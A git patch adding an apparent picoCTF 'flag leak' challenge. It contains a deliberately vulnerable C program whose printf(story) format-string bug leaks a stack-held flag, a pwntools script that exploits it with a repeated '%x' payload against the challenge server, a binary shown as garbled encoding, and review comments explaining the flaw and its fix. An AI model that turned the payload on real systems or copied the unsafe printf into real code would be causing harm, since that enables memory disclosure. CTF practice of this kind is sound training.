From 284e776cd539da60af0234e2b260d3c9d0e785f3 Mon Sep 17 00:00:00 2001
From: THEON-1
Date: Tue, 9 Dec 2025 11:58:45 +0100
Subject: [PATCH] flag leak
---
flag_leak/.gdb_history | 2 ++
flag_leak/sol.py | 29 ++++++++++++++++++++++++++
flag_leak/vuln | Bin 0 -> 15876 bytes
flag_leak/vuln.c | 46 +++++++++++++++++++++++++++++++++++++++++
4 files changed, 77 insertions(+)
create mode 100644 flag_leak/.gdb_history
create mode 100755 flag_leak/sol.py
create mode 100755 flag_leak/vuln
create mode 100644 flag_leak/vuln.c
diff --git a/flag_leak/.gdb_history b/flag_leak/.gdb_history
new file mode 100644
index 0000000..75553ce
--- /dev/null
+++ b/flag_leak/.gdb_history
@@ -0,0 +1,2 @@
+disassemble main
+exit
diff --git a/flag_leak/sol.py b/flag_leak/sol.py
new file mode 100755
index 0000000..044d519
--- /dev/null
+++ b/flag_leak/sol.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_size = 127
+hex_to_read = 127//2
+hex_reader = b'%x'*hex_to_read
+payload = hex_reader + b'.'
+log.info(f"payload: {payload}")
+
+def endian_swap(s, offset=0):
+ result = b''
+ for i in range(3+offset, len(s), 4):
+ result += bytes(reversed(s[i-3:i+1]))
+ return result
+
+conn = remote("saturn.picoctf.net", 65206)
+
+conn.recvuntil(b" >> ")
+conn.sendline(payload)
+conn.recvline()
+data = conn.recvline(keepends=False)[:-1]
+log.info(f"received data: {data}")
+unhexed_data = unhex(data)
+for i in range(4):
+ endian_swapped_data = endian_swap(unhexed_data, offset=i)
+ if b"picoCTF" in endian_swapped_data:
+ break
+log.info(f"processed data: {endian_swapped_data}")
+
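Review bot: The alignment search at the end of the sol.py hunk fails silently: when no offset in `range(4)` contains the marker, `endian_swapped_data` is left holding the last attempt and the closing `log.info` presents it as "processed data" with no sign that the match failed. A `for`/`else` clause with `log.warning("marker not found at any alignment")` makes that outcome visible. `conn` is opened but never closed; `with remote("saturn.picoctf.net", 65206) as conn:` (pwntools tubes are context managers) scopes the teardown to the block. `buffer_size = 127` is assigned but never read, so either `hex_to_read` should derive from it or it should be dropped. The `.gdb_history` hunk sharing this line is a debugger artifact that is better ignored than committed.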
diff --git a/flag_leak/vuln b/flag_leak/vuln new file mode 100755 index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d GIT binary patch literal 15876 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 +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 64 +#define FLAGSIZE 64 + +void readflag(char* buf, size_t len) { + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,len,f); // size bound read +} + +void vuln(){ + char flag[BUFSIZE]; + char story[128]; + + readflag(flag, FLAGSIZE); + + printf("Tell me a story and then I'll tell you one >> "); + scanf("%127s", story); + printf("Here's a story - \n"); + printf(story); + printf("\n"); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + // Set the gid to the effective gid + // this prevents /bin/sh from dropping the privileges + gid_t gid = getegid(); + setresgid(gid, gid, gid); + vuln(); + return 0; +}
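Review bot: `printf(story)` in `vuln()` passes user-controlled input straight through as the format string (CWE-134), so conversion specifiers in the input are interpreted against the caller's stack, which is where the adjacent `flag` buffer lives; the hardened form is `printf("%s", story);`, and building with `-Wformat -Werror=format-security` turns this pattern into a compile error. Since this is the intended bug of the challenge, if it stays a comment such as `// intentionally vulnerable: format string is attacker-controlled` would keep it from being "fixed" by accident. In `readflag()` the `fgets` return value is unchecked and `f` is never closed, so on a failed read the caller uses `buf` uninitialized; `if (fgets(buf, len, f) == NULL) buf[0] = '\0'; fclose(f);` covers both. The `#include` lines have lost their header names in this rendering and the `diff --git`/`@@` header for vuln.c is buried in the binary patch residue above, so the hunk cannot be reliably reformatted here.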